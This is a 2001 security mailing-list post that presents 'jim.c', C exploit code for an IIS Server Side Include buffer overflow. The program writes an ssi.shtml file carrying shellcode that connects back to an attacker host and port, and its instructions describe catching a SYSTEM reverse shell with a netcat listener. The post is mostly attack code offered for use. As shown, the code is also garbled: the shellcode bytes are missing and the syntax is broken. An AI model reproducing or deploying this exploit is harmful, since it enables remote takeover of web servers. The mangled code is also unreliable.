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IIS Server Side Include Buffer overflow exploit code

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Date: 27 Nov 2001 05:26:45 -0000
From: Indigo <>
Subject: IIS Server Side Include Buffer overflow exploit code

As this has been around for a while I thought I'd write 
some exploit code for it. 


/*	jim.c - IIS Server Side Include exploit by 
Indigo <> 2001

	Usage: jim <attacker host> <attacker port>

	This code has been compiled and tested 
on Linux and Win32

	To exploit this vulnerability you must have 
write access to the web root of the 
	target web server. This program will 
generate a file called ssi.shtml. 
	Create a directory in the web root whose 
name is 12 characters long (this is important!)
	eg. ssi_overflow then put this file into the 
new directory. Start up a netcat listener:
	nc -l -p <attacker port> -vv

    	Access the file 
http://target/ssi_overflow/ssi.shtml using a web 
	N.B. I have had problems using Netscape 
to do this but IE works fine.
	A SYSTEM shell will appear in the Netcat 

	You may need to hit return a few times to 
get the prompt up.

	Main shellcode adapted from jill.c by dark 
spyrit <>

	Greets to:

	Morphsta, Br00t, Macavity, Jacob & 
Monkfish...Not forgetting D-Niderlunds

#include <stdio.h>
/* #include <windows.h> uncomment if compiling on 
Win32 */

int main(int argc, char *argv[])

unsigned char shellcode[] =






FILE *fp;
unsigned short int      a_port;
unsigned long           a_host;

printf ("\njim - IIS Server Side Include overflow 
launcher\nby Indigo <> 2001\n\n");

printf ("To exploit this vulnerability you must have 
write access\n");
printf ("to the web root of the target web server.\n\n");
printf ("This program will generate a file called 
printf ("Create a directory in the web root whose 
name is\n");
printf ("12 characters long eg. ssi_overflow then put 
this file\n");
printf ("into the new directory. Start up a netcat 
printf ("nc -l -p <attacker port> -vv\n\n");
printf ("Access the file 
printf ("using a web browser. A SYSTEM shell will 
printf ("N.B. I have had problems using Netscape to 
do this but IE works fine.\n\n");

if (argc != 3)
	printf ("Usage: %s <attacker host> 
<attacker port>\n", argv[0]);
	return (1);

a_port = htons(atoi(argv[2]));
a_port^= 0x9595;

a_host = inet_addr(argv[1]);
shellcode[417]= (a_port) & 0xff;
shellcode[418]= (a_port >> 8) & 0xff;

shellcode[422]= (a_host) & 0xff;
shellcode[423]= (a_host >> 8) & 0xff;
shellcode[424]= (a_host >> 16) & 0xff;
shellcode[425]= (a_host >> 24) & 0xff;

fp = fopen ("./ssi.shtml","wb");

fputs (shellcode,fp);

fclose (fp);
return 0;


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